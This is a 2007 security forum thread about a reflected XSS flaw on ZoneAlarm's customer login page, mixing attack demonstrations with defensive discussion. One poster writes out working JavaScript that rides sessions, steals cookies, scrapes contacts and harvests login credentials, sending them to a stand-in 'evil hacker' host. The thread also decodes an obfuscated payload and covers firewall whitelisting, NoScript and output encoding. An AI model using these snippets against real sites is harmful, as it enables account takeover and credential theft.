XSS sample using Zone Alarm link

Discussion in 'other security issues & news' started by elio, May 10, 2007.

Thread Status:
Not open for further replies.
  1. elio
    elio Registered Member

    Last edited: May 10, 2007
  2. fax
    fax Registered Member

    Re: ZoneAlarm Pro 70_337_000

    Just an empty page... to my end.
    But if a click on my account I get the page where you are asked to input your log-in and password.

    Fax
  3. elio
    elio Registered Member

    Re: ZoneAlarm Pro 70_337_000

    Completely empty?
    What does "click on my account" mean?
    Have you got JavaScript enabled?
  4. fax
    fax Registered Member

    Re: ZoneAlarm Pro 70_337_000

    Yes, empty page... only ZA headers and footers.

    Your link is to ZA customer account. You need to input the login and password to log-in.

    Yes, Java is enabled.

    Fax
  5. fax
    fax Registered Member

    Re: ZoneAlarm Pro 70_337_000

    What I should have seen Elio? o_O

    Fax
  6. elio
    elio Registered Member

    Re: ZoneAlarm Pro 70_337_000

    If you followed the link and you had JavaScript enabled, you should see the real, legit ZoneAlarm customer area login page injected with an external script: XSS PoC by a certain "mario".
    This is innocuous, but if you were already logged in (or you had password automatic completion) and he was a bad guy he could own your account unnoticed, rather than displaying a dumb "defacement" page.
    Screenshot attached (taken 2 minutes ago).

    Attached file: xss.jpg (82.4 KB)
  7. fax
    fax Registered Member

    Re: ZoneAlarm Pro 70_337_000

    Thanks for this... In my case it does not work...
    I have javascript enabled... but I don't use password automatic completion.. and I usually log-off from sites after having used them.

    My passwords are kept safe with double Rijndael 256-Bit encryption and don't stay in clipboard or in memory more than 5 seconds after their use :D

    Fax
  8. mcastr
    mcastr Registered Member

    Re: [Split Topic] XSS sample using ZA link

    It doesn't work for me either, using IE6. I have javascript enabled as well, I get a popup that IE can't open or process the page with a bunch of numbers, then when I click OK I get Page Not Found.

    It does work with Firefox though.
  9. Rmus
    Rmus Exploit Analyst

    Re: [Split Topic] XSS sample using ZA link

    Hi elio,

    This is very interesting!

    My results are the same as mcastr.

    Regarding the link: how did you find it? It appears to be someone's session ID.


    regards,

    -rich
    Last edited: May 12, 2007
  10. fax
    fax Registered Member

    Re: [Split Topic] XSS sample using ZA link

    Yep! I can confirm too...

    With IE7 nothing.
    With Firefox it works!

    Fax
  11. elio
    elio Registered Member

    Re: [Split Topic] XSS sample using ZA link

    Sorry, didn't bother to test on IE :oops:
    It seems that the included script being loaded from a non-SSL server was troublesome ("This page contains unprotected objects...").

    I've got no SSL server to work-around, but this one will work on IE7 nonetheless :)

    rich:
    The session ID is mario's, I guess. I found the original in RSnake's forum.
    I changed it to use English instead of German, and now I "enhanced" it to work with IE7.
    Those hardcore hackers, thinking that if it works with Firefox it's gonna work everywhere ;)
    Last edited: May 10, 2007
  12. Rmus
    Rmus Exploit Analyst

    Re: [Split Topic] XSS sample using ZA link

    Well, after thinking about it, it can't be someone's sessionID because every time I've checked my own sessions,
    once I've logged off and the session cookie is discarded, that page will no longer load.

    So, what has he done? How did he get that page to load that you posted?

    Since it's javascript, a search of the cached .js files revealed the culprit:

    http://www.urs2.net/rsj/computing/imgs/xss_cache.gif

    http://www.urs2.net/rsj/computing/imgs/xss_js.gif

    Now, how did that i.js file get cached? Looking at the source code revealed nothing.
    Hmmm... Must be some obfuscation somewhere.

    Comparing a legitimate ZA login page with mario's page you linked reveals an interesting difference.
    The following appears in mario's page but not the legitimate ZA page:

    Code:
    <input type="hidden" value="glo"><script>eval(String.fromCharCode(97,61,100,111,99,117,
    109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,
    105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,
    110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,
    112,101,110,100,67,104,105,108,100,40,97,41,59))</script>bal.jsp" name="destination"/></td>
    
    Well, that eval(String.fromCharCode happens to be appended to the link you posted:

    Code:
    https://www.zonealarm.com/store/application;jsessionid=GAwSf4C5dJtd3A5PIG4e7
    TNkOv0tIU9JP0UHFsT9JD7HKigvl1Q2!-1992105728!-1062696903!7551!7552!NONE?namespace=zls_user&
    origin=glo%22%3E%3Cscript%3Eeval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,
    46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,
    46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,
    111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,
    41,59))%3C/script%3Ebal.jsp&event=link.login&dc=34std&ctry=DE&lang=en
    
    Easy enough to convert to ASCII. The pertinent data is
    Code:
    104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115
    
    which is:
    Code:
    http://h4k.in/i.js
    
    While this is interesting, I hope you will eventually post a real-world example as you described in the other thread, beginning with your post #25, that doesn't require user interaction:

    http://www.wilderssecurity.com/showthread.php?t=173750

    You wrote later in the thread,

    I gave an old PayPal example, whose techniques you said were outdated:
    Fair enough. So, give us an example.

    You wrote in the other thread,

    I would like to see a real-world example - no PoC or snake oil - where you explain step-by-step what happens, from the moment the user goes to the page, through the Log-in, and most important how the hacker retrieves the information. I assume he doesn't knock on your door and ask you pretty-please.

    It is the point of retrieval which will give us something to work with.

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier
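The decoding Rmus did by hand, done in code as an added example that is not from the thread: the function URL-decodes the query string, finds every String.fromCharCode(...) call and turns it back into text, then lists the external URLs the injected script would load, which is the same check a defender can run over a web server's access log. The query string is copied from the link quoted in the post (jsessionid left out); the regexes and function names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample: the query string of the link quoted above, parameters
# copied verbatim from the post (the jsessionid path segment is omitted).
SAMPLE_QUERY = (
    "namespace=zls_user&origin=glo%22%3E%3Cscript%3Eeval(String.fromCharCode("
    "97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,"
    "101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,"
    "116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,"
    "117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,"
    "100,40,97,41,59))%3C/script%3Ebal.jsp&event=link.login&dc=34std&ctry=DE&lang=en"
)

# Assumed patterns: a fromCharCode call with a comma-separated number list,
# an opening <script> tag, and any http(s) URL inside the decoded JavaScript.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)
URL_IN_JS = re.compile(r"https?://[^\s'\"<>]+")


def decode_fromcharcode(js: str) -> list[str]:
    """Turn every String.fromCharCode(n, n, ...) call in js back into text."""
    return [
        "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip())
        for m in FROMCHARCODE.finditer(js)
    ]


def inspect_query(query: str) -> list[dict]:
    """Report each parameter whose URL-decoded value carries a script tag or a
    fromCharCode call, together with the decoded payload and the URLs in it."""
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not (SCRIPT_TAG.search(value) or FROMCHARCODE.search(value)):
            continue
        decoded = decode_fromcharcode(value)
        findings.append({
            "param": name,
            "reflected_value": value,
            "decoded_payloads": decoded,
            "external_urls": sorted({u for d in decoded for u in URL_IN_JS.findall(d)}),
        })
    return findings


if __name__ == "__main__":
    for finding in inspect_query(SAMPLE_QUERY):
        print(finding["param"], "->", finding["decoded_payloads"], finding["external_urls"])
```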
  13. elio
    elio Registered Member

    Re: [Split Topic] XSS sample using ZA link

    OK, random porn site containing the following:
    Code:
    <iframe style="width: 1px; height: 1px;" 
      src="http://www.zonealarm.com/store/...all...our...fancy...XSS...URL">
    </iframe>
    
    This will navigate automatically (no user interaction) silently and invisibly to the vulnerable site.
    If there's some form of auto-completion or "remember me" function, or the victim is already logged in... OMG!
    That's the easiest part, really.
    Three non-interactive scenarios:
    1. Victim already logged in and we already know the topology of the vulnerable site
      We can ride the session using JavaScript navigation, no need to retrieve actual credentials.
      Example (supposing we're in some "send money form"):
      Code:
      document.getElementById("amount").value="10000";
      document.getElementById("pay-form").submit();
      
      Or, if we want to scrape the content of some interesting page, like his contact list on a webmail:
      Code:
      var x = new XMLHttpRequest();
      x.open("GET", "contactlist.aspx", false);
      x.send(null);
      var f = document.body.appendChild(document.createElement("form"));
      // appendChild takes an element, not the string "input"
      var i = f.appendChild(document.createElement("input"));
      i.name = "contacts";
      i.value = x.responseText;
      f.action="http://elio-the-evil-hacker.com/mail_collector.php";
      f.submit();
      
    2. Victim already logged in, site internals unknown or changing
      We could steal session cookie and ride the session manually, just
      Code:
      new Image().src="http://elio-the-evil-hacker.com?session-cookie=" + 
      document.cookie
      
    3. Victim not logged in, but has form automatic completion enabled
      We just wait for login form to be auto-completed and then we phone home (or we "click" on the submit button and ride the session, if we know how the site is made inside):
      Code:
      function xss() {
       var f = document.forms[2]; // grab the 3rd form in the page, the login one
       if(!(f && f.zl_user_name && f.zl_user_password)) return // nothing to see here
       if(f.zl_user_name.value && f.zl_user_password.value) {
         // we've got everything, let's phone home
         new Image().src="hxxp://elio-the-evil-hacker.com?u=" + 
           escape(f.zl_user_name.value) + "&p=" + 
           escape(f.zl_user_password.value);
      
        // OK, this is just a demo
        document.body.innerHTML = "Your credentials have just been stolen:<br>" + 
             f.zl_user_name.value + ", " + 
             f.zl_user_password.value + "<h1>MWAHAHAHA!</h1>";
        return;
       }
       if(f.zl_user_password.onchange == xss) return;
       f.zl_user_name.onchange = xss;
       f.zl_user_password.onchange = xss;
      }
      window.onload = xss;
      
    If everything else fails, we can just resort to good old social engineering combined with approach #3:
    I could post in this forum something like
    OMG, the location bar and the SSL lockpad both say I'm on the legit site: it may even work :p
    Last edited: May 10, 2007
  14. Rmus
    Rmus Exploit Analyst

    Re: [Split Topic] XSS sample using ZA link

    This is the point at which I think the attack can be stopped. Can you guess how?

    I will return to this in a few hours - I'm leaving for a meeting - and I will lay out a security strategy that might work.

    Meanwhile, since you know the code thoroughly, can you suggest a solution to prevent the stealing of the user's information?

    regards,

    -rich

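One server-side answer to the question above, as an added example that is not code from the thread or from ZoneAlarm: the hidden input Rmus quoted is rebuilt the vulnerable way (the origin parameter pasted raw into the attribute, so a quote closes it) and the fixed way (attribute-encoded), with an allow-list on the parameter's expected shape as a second layer. The short payload and the allow-list pattern are constructed assumptions.

```python
import html
import re

# Constructed sample in the shape of the thread's payload: a quote closes the
# value attribute and a <script> follows; "bal.jsp" is appended by the template
# to complete the original "global.jsp" destination. This fromCharCode call
# decodes to alert(1), not the thread's remote script.
PAYLOAD = 'glo"><script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>'

# Assumed allow-list: the legitimate value on the page is a short lowercase
# token ("glo"), so anything else is rejected before it reaches the template.
VALID_ORIGIN = re.compile(r"^[a-z]{1,16}$")


def render_destination_input(origin: str, encode: bool) -> str:
    """Build the hidden input shown in the thread. encode=False reproduces the
    bug (parameter inserted raw); encode=True attribute-encodes the value so
    the quote and angle brackets become inert text inside the attribute."""
    value = origin + "bal.jsp"
    if encode:
        value = html.escape(value, quote=True)  # escapes & < > " '
    return f'<input type="hidden" value="{value}" name="destination"/>'


def validate_origin(origin: str) -> str:
    """Second layer: refuse the parameter unless it has the expected shape."""
    if not VALID_ORIGIN.fullmatch(origin):
        raise ValueError(f"unexpected origin value: {origin!r}")
    return origin


def has_injected_script(markup: str) -> bool:
    """Demo check: does a real <script> tag appear in the rendered markup?"""
    return bool(re.search(r"<\s*script\b", markup, re.IGNORECASE))


if __name__ == "__main__":
    print("vulnerable:", render_destination_input(PAYLOAD, encode=False))
    print("fixed:     ", render_destination_input(PAYLOAD, encode=True))
```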
  15. Rmus
    Rmus Exploit Analyst

    Well, I was hoping you might have come up with a suggestion...

    OK. Somewhere in one of these threads I mentioned that everyone should know how their secure-transaction sites work. To be really on top of it would be to know the IP addresses that are called during the transaction.

    Some sites use an insecure HTTP home page and then switch to a secure log-in HTTPS page. My bank has just one secure HTTPS URL for the entire transaction.

    How do you determine the IP(s)? By letting your browser prompt when you initially establish your account.

    This requires that you have three browser rules in your firewall ruleset:
    • 1) HTTP Port 80 any address: this is your normal surfing rule - all traffic permitted
    • 2) HTTP Port 80 custom addresses: here, you enter any HTTP address that your transaction sites use
    • 3) HTTPS Port 443 custom addresses: same as rule 2) but HTTPS
    Here is my rule set:

    http://www.urs2.net/rsj/computing/imgs/xss_ruleset.gif

    The second two rules have created a White List (custom addresses) of permitted IPs.

    Have you guessed by now what's going on? This is one way of preventing pharming.

    Pharming is when a user thinks she/he is accessing the legitimate site's page, when she/he is actually accessing the IP of a spoofed site.

    And isn't that really what's going on behind the scenes in these scripts? When the user clicks "Submit" the information should stay within the site, but this script says, Nope: I'm sending this to elio-the-evil-hacker.

    Well, maybe not.

    Let's test it out with your ZA link from your first post.

    I went to the ZA site to snag the IPs - that site has tracking and webstore stuff. Oh well... in the name of testing...

    So, with those IPs in the custom addresses, let's see what happens.

    Now, with this setup, before you go to your transaction site, you uncheck the first browser rule and this passes the firewall check order down to the next rule, which will alert if an IP request doesn't match what is on the White List (custom addresses).

    So, I click on your link, the page starts to load, it looks like the normal ZA site, and as soon as the "eval(String.fromCharCode" is appended to the PageSourceCode, the attempt to connect out to cache the i.js file initiates,

    Code:
    http://h4k.in/i.js
    
    ooops... since that IP doesn't match any IP on the White List:

    http://www.urs2.net/rsj/computing/imgs/xss_kerio.gif

    At this point, the alert user will realize something is amiss. Verifying:

    Code:
    Initiating server query ...
    Looking up the domain name for IP: 62.75.146.110
    The domain name for the IP address is: static-ip-62-75-146-110.inaddr.intergenia.de
    Date: Fri, 11 May 2007 01:12:13 GMT
    Server: Apache
    X-Pingback: http://mario.heideri.ch/xmlrpc.php
    Query complete.
    
    ...
    
    netname:      VSERVER-1
    descr:        vSERVER - Virtual dedicated Server-Hosting
    descr:        http://www.vserver.de
    country:      DE
    
    and:

    Code:
    Initiating server query ...
    Looking up IP address for domain: h4k.in
    The IP address for the domain is: 62.75.146.110
    Query complete.
    
    In your script, when the user clicks "Submit" and initiates the request to connect to elio-the-evil-hacker, a similar alert would be triggered.

    Well, there may be some sophisticated ways around this, but I don't think cybercriminals are too worried about many people going to this trouble. I know of only one other person besides myself.

    regards,

    -rich

  16. nadirah
    nadirah Registered Member

    The NoScript extension for firefox now has some XSS handling functionality.

    V. 1.1.4.8.070430 "XSS Sniper + Flash Nanny"

    Main good news:
    • Experimental noscript.contentBlocker hidden preference, extends the content restrictions for untrusted sites also to trusted pages, turning NoScript into a general content blocker for Java, Flash and other plugins functionally similar to FlashBlock.
    • Reset button in Options Dialog restores default settings.
    • Much improved precision of the Anti-XSS protection, enhanced also by configurable exceptions and an "Unsafe Reload" command to deal with very few remaining false positives.
      While Cross-Site Scripting (XSS) vulnerabilities need to be fixed by the web developers, now users can finally do something to protect themselves: NoScript is the only effective defense available to "web-consumers", waiting for "web-providers" to clean up their mess.
    • Options dialog simplification and reorganization.
    • New option to block META redirections placed inside <NOSCRIPT> elements (Firefox 2 and above, no SeaMonkey yet)
    • Plays nicer with Digg and other "Web 2.0" sites, by definitely fixing an occasional glitch which previously happened with the nested dynamic loading hack used by some AJAX libraries.
    • Super fast and reliable reload when permissions change.
    • Long awaited blacklist feature.
    More in the changelog... If you don't want this information page to open next time you upgrade NoScript, please read this FAQ.
  17. nadirah
    nadirah Registered Member

    Besides the above, here are some details of the page source at hxxps://www.zonealarm.com/store/......
    Code:
    <!--WEBSIDESTORY CODE HBX1.0 (Universal)-->
    <!--COPYRIGHT 1997-2004 WEBSIDESTORY,INC. ALL RIGHTS RESERVED. U.S.PATENT No. 6,393,479B1. MORE INFO:http://websidestory.com/privacy-->
    
    <script language="javascript">
    var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;}
    var hbx=_hbEvent("pv");hbx.vpc="HBX0100u";hbx.gn="ehg.zonelabs.com";
    
    //BEGIN EDITABLE SECTION
    //CONFIGURATION VARIABLES
    hbx.acct="DM5404078ADR94EN3";//ACCOUNT NUMBER(S)
    hbx.pn="/store/login.jsp";//PAGE NAME(S)
    hbx.mlc="";//MULTI-LEVEL CONTENT CATEGORY
    hbx.pndef="title";//DEFAULT PAGE NAME
    hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
    
    //OPTIONAL PAGE VARIABLES
    //ACTION SETTINGS
    hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME
    hbx.lt="auto";//LINK TRACKING
    hbx.dlf="n";//DOWNLOAD FILTER
    hbx.dft="n";//DOWNLOAD FILE NAMING
    hbx.elf="n";//EXIT LINK FILTER
    
    //SEGMENTS AND FUNNELS
    hbx.seg="";//VISITOR SEGMENTATION
    hbx.fnl="";//FUNNELS
    
    //CAMPAIGNS
    hbx.cmp="";//CAMPAIGN ID
    hbx.cmpn="";//CAMPAIGN ID IN QUERY
    hbx.dcmp="";//DYNAMIC CAMPAIGN ID
    hbx.dcmpn="";//DYNAMIC CAMPAIGN ID IN QUERY
    hbx.dcmpe="";//DYNAMIC CAMPAIGN EXPIRATION
    hbx.dcmpre="";//DYNAMIC CAMPAIGN RESPONSE EXPIRATION
    hbx.hra="";//RESPONSE ATTRIBUTE
    hbx.hqsr="";//RESPONSE ATTRIBUTE IN REFERRAL QUERY
    hbx.hqsp="";//RESPONSE ATTRIBUTE IN QUERY
    hbx.hlt="";//LEAD TRACKING
    hbx.hla="";//LEAD ATTRIBUTE
    hbx.gp="";//CAMPAIGN GOAL
    hbx.gpn="";//CAMPAIGN GOAL IN QUERY
    hbx.hcn="";//CONVERSION ATTRIBUTE
    hbx.hcv="";//CONVERSION VALUE
    hbx.cp="null";//LEGACY CAMPAIGN
    hbx.cpd="";//CAMPAIGN DOMAIN
    
    //CUSTOM VARIABLES
    hbx.ci="";//CUSTOMER ID
    hbx.hc1="en";//CUSTOM 1
    hbx.hc2="DE";//CUSTOM 2
    hbx.hc3="English-EU";//CUSTOM 3
    hbx.hc4="/store/login.jsp | lang-en_ctry-DE_dc-34std_campaign_id-nvp_lid-nvp_pid-nvp_prt-nvp_c-nvp_d-nvp_w-nvp";//CUSTOM 4
    hbx.hrf="";//CUSTOM REFERRER
    hbx.pec="";//ERROR CODES
    
    //INSERT CUSTOM EVENTS
    
    //END EDITABLE SECTION
    
    //REQUIRED SECTION. CHANGE "YOURSERVER" TO VALID LOCATION ON YOUR WEB SERVER (HTTPS IF FROM SECURE SERVER)
    </script>
    <script language="javascript1.1" defer src="/store/media/js/hbx/hbx.js"></script>
    
    Code:
    <!-- Begin SearchRev Lead Tag -->
      
      <noscript>
      <img src='http://s2.srtk.net/www/delivery/ti.php?bannerid=81&trackerid=258&cb=8829' width='1' height='1' border='0'/>
      </noscript>
      <!-- Begin SearchRev Lead Tag -->
      <script type="text/javascript" src="http://s2.srtk.net/www/delivery/srtag.s2.js"></script>
      <script type="text/javascript">
      // SearchRev tag parameters (do not change)
      var sr_tagtype="LEAD";
      var fpc=1;
      sr_tag(258,81);
    </script>
      <!-- End SearchRev Lead Tag -->
      <!-- -----The following Coding is for the Advertising.com Web Beacon ---- -->
      <img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=znealrm_cs=1&betq=3239=373541" width = "1" height = "1" border = "0">
  18. Mrkvonic
    Mrkvonic Linux Systems Expert

    Hello,

    elio, good job on the code. Now... the tricky question.

    Do you remember what I asked you in the other thread, regarding the link in the forum and getting owned?

    Well, I do not see how the system gets owned here. No silent installation of a trojan that takes over the system or anything ... That's something that cannot be readily done in Firefox.

    For example, reading an arbitrary file off the hard disk, changing a dll, injecting tomato soup into winlogon etc...

    Mrk
  19. fax
    fax Registered Member

    Unless it is better devised, you can still easily stop this attack, even without setting specific rules...

    Image1.jpg

    Fax
  20. elio
    elio Registered Member

    Unless I'm missing something, your own screenshot tells a different tale o_O
  21. fax
    fax Registered Member

    The screenshot displays what happens if you do not allow an insecure connection while within a secure connection, i.e. operation aborted.

    So, the next step to improve it is to connect to a secure site, so as to avoid IE warning you :D

    Fax
  22. elio
    elio Registered Member

    Do you remember the premise in my first "real" post in this forum?
    While your last statement is questionable too, I do believe Mozilla team is the most responsive around, but I also believe PC "0wn3sh1p" is a bit overrated.

    Many people here tend to overlook what goes on inside their browsers, as long as they've got antivirus, firewall and possibly a sandbox wrapped around their browsers.

    So anything JavaScript related is either labeled as browser specific (my browser is safer than yours) or paranoid (my PC can't be hacked anyway), while we're talking about cross-browser web bugs, not browser/system vulnerabilities.

    The fact is that a steadily increasing part of our life is moving online, so having our web identities (and bank accounts) compromised can be just as bad as having our PCs injected with "tomato soup into winlogon etc..."
  23. elio
    elio Registered Member

    Sorry, I go offline from time to time :)
    Anyway, the only suggestion I could give at this moment would be nadirah's one (use NoScript) coupled with never whitelisting sites containing user-generated content!

    I can only agree, but I cannot see any "normal" user doing that.

    My bank, for instance, which is still considered one of the most secure in the world, even serves images and other static content from HTTP connections even in "secure" pages (for performance reasons, I guess).
    Again, I can only agree.
    I also unconditionally approve your attitude to security, default deny (which, if taken seriously, would reveal how anti-virus products as they're conceived today are just a money-mongering joke).
    But you're suggesting to whitelist HTTP connections (i.e. the sites I can open) and prompt me (block me!) every time I follow a casual link :eek:
    The Noscript extension has been recently called "madness" because denying just code execution (in a non-blocking, easy-opt-in fashion) would be too much "crippling the web"...
    It's not, indeed, but good attempt anyway.
    Reflected XSS is neither Phishing nor Phleshing :D nor Pharming, even if it can be used as a tool to make those scams way more effective: no anti-phishing system that I know would detect these attacks.
    The most important aspect is that the page is not made up to appear like the original, it is the true original from the true original server (just "enhanced" with some alien code of mine).
    Now the cool thing is not that my code, once it's there, could steal your data: the real deal is that it can do anything YOU can do.
    Even supposing that you whitelist the "good" HTTP traffic (and this sounds hardly effective if I decide to post the data in a google group, in a google document or in another wonderful read/write google tool using an account set up just for this scam), how do you cope with the fact I could order a money transfer (supposing this is a bank account or Paypal) or send an email containing the interesting data to my disposable mail address (supposing this is a webmail) or any other funny activity I can imagine to perform impersonating you without leaving the vulnerable site*?

    *ehy fax ^^ :D
    Last edited: May 11, 2007
  24. fax
    fax Registered Member

    Eheh... LOL :-*

    Fax
  25. Mrkvonic
    Mrkvonic Linux Systems Expert

    Hello,

    elio,

    Regarding in-browser threats. I think these are indeed overrated, too.

    Automatically remember your password
    Well, that does kind of contradict the meaning of password right?

    Doing sensitive stuff online
    This has much to do with your country law and bank policy than the Internet. For example, your bank account is limited to transferring money only to a number of accounts. So it does not matter if someone can enter, because that someone cannot do any damage.

    More on doing sensitive stuff online
    Why click on a link in an email to access your bank site? You know your bank site. You do not need funny looking links to do that. This has little to do with browser security and much with brains.

    Life online
    No matter how fervently Yahoo or MySpace might want me to dedicate my feeble existence to their badly coded pages - and read about my favorite celebrities doing charity enemas in Uganda - this is not something that is going to happen any time soon.
    - Personally, because I refuse to suckle on the MPIA teat.
    - Globally, luckily, because people are morons and it will take them 30 years to get the hang of the Internet.

    Eventually, it comes to brains.
    If you are not likely to fall for any social engineering, you won't fall for this one too. So it's not really a matter of security. It's more of a trend. The victims will always be the same group of people, roughly 90% of the population, the people who never learn.

    Mrk